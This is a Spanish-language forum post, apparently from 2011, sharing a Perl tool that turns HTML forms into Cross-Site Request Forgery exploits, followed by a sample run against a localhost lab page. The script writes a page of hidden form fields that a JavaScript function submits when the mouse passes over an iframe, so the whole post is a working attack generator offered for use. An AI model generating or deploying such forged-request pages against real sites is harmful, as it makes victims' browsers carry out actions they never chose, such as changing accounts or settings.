[Perl] CSRF T00l

Una simple herramienta para ahorrar trabajo en la creacion de un exploit
para la vulnerabildiad Cross Site Request Forgery , despues genera el resultado
en una carpeta creada con el programa con el nombre de la web.

Código

#!usr/bin/perl
#CSRF T00l (C) Doddy Hackman 2011
 
use HTML::Form;
use URI::Split qw(uri_split);
 
installer();
 
head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();
 
sub now {
 
unless(-f $_[0]) {
print "\n[-] File Not Found\n";
copyright();
}
 
print "\n[+] File to parse : ".$_[0]."\n\n";
 
open(FILE,$_[0]);
my $words = join q(),<FILE>;
close(FILE);
 
my @testar = HTML::Form->parse($words,"/");
 
$count = 0;
foreach my $test(@testar) {
$count++;
print "\n\n -- == Form $count == --\n\n";
if ($test->attr(name) eq "") {
print "[+] Name : No Found"."\n";
} else {
print "[+] Name : ".$test->attr(name)."\n";
}
print "[+] Action : ".$test->action."\n";  
print "[+] Method : ".$test->method."\n";
print "\n-- == Input == --\n\n";
@inputs = $test->inputs;
print "Type\t\tName\t\tValue\n";
foreach $in(@inputs) {
print $in->type."\t\t";
print $in->name."\t\t";
print $in->value."\t\t\n";
}
}  
print "\n\n[+] Form to generate : ";
chomp(my $op = <stdin>);
if ($op ne "") {
$op--;
my $probar = (HTML::Form->parse($words,"/"))[$op];
 
my $action = ver($words,$op);
my $fin = nombre($action).".html";
savefile("<form action=$action method=".$probar->method." name=exploit>",$fin);
@input = $probar->inputs;
foreach $in(@input) {
print "\n[+] Value of the ".$in->name." : ";
chomp(my $val = <stdin>);
savefile("<input type=hidden name=".$in->name." value=".$val.">",$fin);
}
my $final = "</form><script language=javascript>function colocar(){document.exploit.submit()}
</script><iframe width=6% height=%6 overflow=hidden onmouseover=javascript:colocar()>
";
savefile($final,$fin);
print "\n\n[+] CSRF Exploit Generated\n\n";
print "[+] To can see in logscsrf/".$fin."\n\n";
}
}
 
sub ver {
my $probar = (HTML::Form->parse($_[0],"/"))[$_[1]];
my $action = $probar->action;
my $co = $action;
if ($action eq "" or $action eq "/"){
print "\n\n[+] Action : ";
chomp(my $action = <stdin>);
return $action;
} else {
return $co;
}
}
 
sub installer {
unless (-d "logs_csrf/") {
mkdir("logs_csrf/","777");
}}
 
sub nombre {
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
return $auth;
}
 
sub savefile {
open (SAVE,">>logs_csrf/".$_[1]);
print SAVE $_[0]."\n";
close SAVE; 
}
 
sub sintax {
print "\n[+] sintax : $0 <file>\n";
}
 
sub head {
print "\n\n -- == CSRF T00l == --\n\n";
}
 
sub copyright {
print "\n\n -- == Doddy Hackman 2011 == --\n\n";
exit(1);
}
 
# ¿ The End ?

Ejemplo de uso

Código:


C:\Documents and Settings\Administrador\Escritorio\Leviatan\Hacking\WarFactoy II
 Finales\CSRF Tool>tool.pl read.txt


 -- == CSRF T00l == --


[+] File to parse : read.txt



 -- == Form 1 == --

[+] Name : No Found
[+] Action : http://localhost/labs/csrf/csrf.php
[+] Method : GET

-- == Input == --

Type            Name            Value
text            ver
password                veras
submit          control         Agregar


 -- == Form 2 == --

[+] Name : No Found
[+] Action : /
[+] Method : POST

-- == Input == --

Type            Name            Value
text            ac
submit          ee              aaa


[+] Form to generate : 1

[+] Value of the ver : aaa

[+] Value of the veras : aaa

[+] Value of the control : aaa


[+] CSRF Exploit Generated

[+] To can see in logscsrf/localhost.html



 -- == Doddy Hackman 2011 == --